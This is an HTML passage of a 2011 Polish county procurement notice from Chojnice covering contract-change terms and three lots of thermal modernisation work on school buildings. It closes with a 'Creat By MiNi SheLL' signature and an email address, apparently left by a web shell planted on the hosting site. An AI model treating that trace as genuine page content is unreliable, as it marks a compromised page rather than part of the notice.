dokonują odpowiedniej zmiany wynagrodzenia umownego - dotyczy to części wynagrodzenia za roboty, których w dniu zmiany stawki podatku VAT jeszcze nie wykonano. 6. Zamawiający przewiduje możliwość dokonania zmiany postanowień zawartej umowy w stosunku do treści oferty w zakresie zmiany zabezpieczenia umowy. Zmiana przewidziana w art. 149 ust. 1 Pzp. 7. Zamawiający przewiduje możliwość dokonania zmiany postanowień zawartej umowy w stosunku do treści oferty w zakresie rozszerzenia odpowiedzialności z tytułu rękojmi poprzez wydłużenie terminu rękojmi oraz przedłużenie terminu udzielonej gwarancji w przypadku zaproponowania takiego rozwiązania przez wykonawcę. 8. Zamawiający przewiduje możliwość dokonania zmiany postanowień zawartej umowy w stosunku do treści oferty w zakresie zamiany podwykonawców w przypadku: 1) wprowadzenia nowego podwykonawcy, 2) rezygnacji podwykonawcy, 3) zmiany wartości lub zakresu robót wykonywanych przez podwykonawców, Zamawiający może wyrazić zgodę na powyższe, po pisemnym zaakceptowaniu umowy wykonawcy z podwykonawcą w terminie 14 dni od przekazania tej umowy przez wykonawcę. 9. Zamawiający przewiduje możliwość dokonania zmiany harmonogramu prac w przypadku: 1) wystąpienia uzasadnionych konieczności wprowadzenia lub aktualizacji harmonogramu realizacji prac, 2) zmiany umowy w zakresie terminu realizacji przedmiotu umowy. Zmiany harmonogramu przedstawione przez wykonawcę muszą uprzednio uzyskać akceptację zamawiającego. 10. Zamawiający przewiduje możliwość dokonania zmiany postanowień zawartej umowy w stosunku do treści oferty w zakresie zmiany osób wymienionych w umowie w przypadku: 1) śmierci, choroby, rezygnacji, zwolnienia pracownika lub innych zdarzeń losowych, 2) zastrzeżeń jednej ze stron, co do kompetencji w/w osób. 11. W przypadku zmiany kierownika budowy lub projektanta nowy kierownik budowy lub projektant musi spełniać wymagania określone w SIWZ dla kierownika budowy lub projektanta. 12. Powyższe postanowienia stanowią katalog zmian, na które zamawiający może Wyrazić zgodę. Powyższe postanowienia nie stanowią zobowiązania zamawiającego do wyrażenia zgody na ich wprowadzenie.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.powiat.chojnice.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Chojnicach, ul. 31 Stycznia 56..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.04.2011 godzina 09:00, miejsce: Biuro Obsługi Interesanta Starostwa Powiatowego w Chojnicach, ul. 31 Stycznia 56..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie to jest finansowane ze środków Budżetu Powiatu przy założeniu uzyskania dofinansowania ze środków Unii Europejskiej w ramach RPO WP 2007 - 2013.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Termomodernizacja budynku Zespołu Szkół Ponadgimnazjalnych w Brusach..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres robót: 1. Izolacja ścian fundamentowych a. izolacja pionowa z papy zgrzewalnej podkładowej na pow. 105,82 m2 b. izolacja cieplna - płyty styropianowe ekstrudowane gr. 10,0 cm na pow. 105,82 m2 2. Izolacja ścian nadziemia a. przygotowanie podłoża b. ocieplenie ścian płytami styropianowymi FS 20 gr. 13 cm na pow. 809,57 m2 c. warstwa siatki z włókna szklanego d. wyprawa elewacyjna cienkowarstwowa z tynku silikatowego e. malowanie tynków zewnętrznych farbą silikonową f. obróbki blacharskie z blachy powlekanej gr. 0,55 mm 3. Cokół a. rozebranie okładziny ściennej z płytek, b. gruntowanie podłoża c. ocieplenie z płyt styropianowych FS 20 gr 10 cm na pow. 88,51 m2 d. warstwa siatki z włókna szklanego e, wyprawa elewacyjna cienkowarstwowa z tynku silikatowego f. malowanie tynków zewnętrznych farbą silikonową g. obróbki blacharskie z blachy powlekanej gr. 0,55 mm 4. Dach a. przygotowanie podłoża b. izolacja cieplna z styropapy (styropian FS 20) grubości 15 cm oklejonej dwustronnie papą c. pokrycie z papy termozgrzewalnej nawierzchniowej gr. 5,2 mm na pow. 646,27 m2 5. Wymiana drzwi stalowych na drzwi aluminiowe przeszklone o pow. 8,55 m2 demontaż istniejącej zabudowy stalowej, wykonanie ścian z gazobetonu odmiany 700 o grubości 24 cm. Nadproża żelbetowe, izolacja termiczna ścian przy zastosowaniu styropianu FS 20 gr. 12 cm. Wyprawa elewacyjna silikatowa oraz malowanie farbą silikatową, montaż drzwi aluminiowych zewnętrznych szt. 2 oraz wewnętrznych szt. 2 6. Montaż zaworów termostatycznych szt. 90 wraz z regulacją instalacji c.o..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.21.42.20-8, 45.26.12.10-9, 45.26.13.20-3, 45.32.00.00-6, 45.42.11.31-1, 45.42.11.32-8, 45.44.21.10-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.08.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Termomodernizacja budynku Zespołu Szkół w Chojnicach..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres robót: 1. Izolacja termiczna ścian a) cokół przygotowanie podłoża, 2 x papa termozgrzewalna izolacyjna, styropian hydromax grubości 12 cm na pow. 218,39 m2 na zaprawie klejowej + kołki montażowe, 2 x siatka z włókna szklanego zatopiona w zaprawie, tynk cokołowy b) ściana zewnętrzne powyżej cokołu przygotowanie podłoża, styropian FS 15 grubości 12 cm na pow. 1708,92 m2 na zaprawie klejowej + kołki montażowe, 2 x siatka z włókna szklanego zatopiona w zaprawie, tynk mineralny, farba silikatowa 2. Docieplenie dachu, przygotowanie podłoża, izolacja cieplna z styropapy (styropian FS 20) grubości 15 cm oklejonej dwustronnie papą, pokrycie z papy termozgrzewalnej nawierzchniowej gr. 5,2 mm na pow. 646,27 m2 , obróbki blacharskie z blachy tytanowo-cynkowej gr. 0,55 mm 3. Wymiana stolarki okiennej i drzwiowej Okna z PCV w kolorze białym o okuciach wzmocnionych. Okna z rozszczelnieniem ręcznym. Do szklenia stosować wysokiej jakość szyby typu float. Zestawy szybowe z dwiema szybami w grubościach od 24-33 mm i właściwości termoizolacyjne: współczynnik przenikania ciepła k-1,1 W/m2 K. Okna powinny być wyposażone w okucia obwiedniowe, wzmocnione. Drzwi zewnętrzne z drewna klejonego, płycinowe odtworzone wg istniejących. Współczynnik przenikania ciepła 1,6 W/m2 K. Ilości okien i drzwi oraz ich kształt i podział zgodnie z zestawieniem stolarki. Uwaga Przed wykonaniem stolarki należy sprawdzić wymiary z natury 4. Wymiana rynien i rur spustowych oraz obróbki blacharskiej Rynny o 18 cm, rury spustowe o 15 cm. Dla rynien i rur spustowych oraz obróbek blacharskich zastosować blachę tytanowo - cynkową gr. 0,55 mm..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.21.42.20-8, 45.26.12.10-9, 45.26.13.20-3, 45.32.00.00-6, 45.42.11.31-1, 45.42.11.32-8, 45.44.21.10-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.08.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Termomodernizacja budynku - wymiana stolarki w Centrum Kształcenia Ustawicznego w Chojnicach..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wymiana stolarki okiennej w zakresie: ON 6 10 szt. ON 7 5 szt. ON 8 10 szt OS 6 2 szt. OS 20 5 szt. wraz z parapetami zewnętrznymi Okna z PCV w kolorze białym o okuciach wzmocnionych. Okna z rozszczelnieniem ręcznym. Do szklenia stosować wysokiej jakość szyby typu float. Zestawy szybowe z dwiema szybami w grubościach od 24-33 mm i właściwości termoizolacyjne: współczynnik przenikania ciepła k-1,1 W/m2 K. Okna powinny być wyposażone w okucia obwiedniowe, wzmocnione. Wymiar stolarki drzwiowej: DN 1 1 szt. Materiał aluminium w kolorze brązowym. Przeszklenie w połowie węższego skrzydła. Dwa zamki. Uwaga Przed wykonaniem stolarki należy sprawdzić wymiary z natury..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.21.42.20-8, 45.42.11.32-8, 45.42.11.32-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.08.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com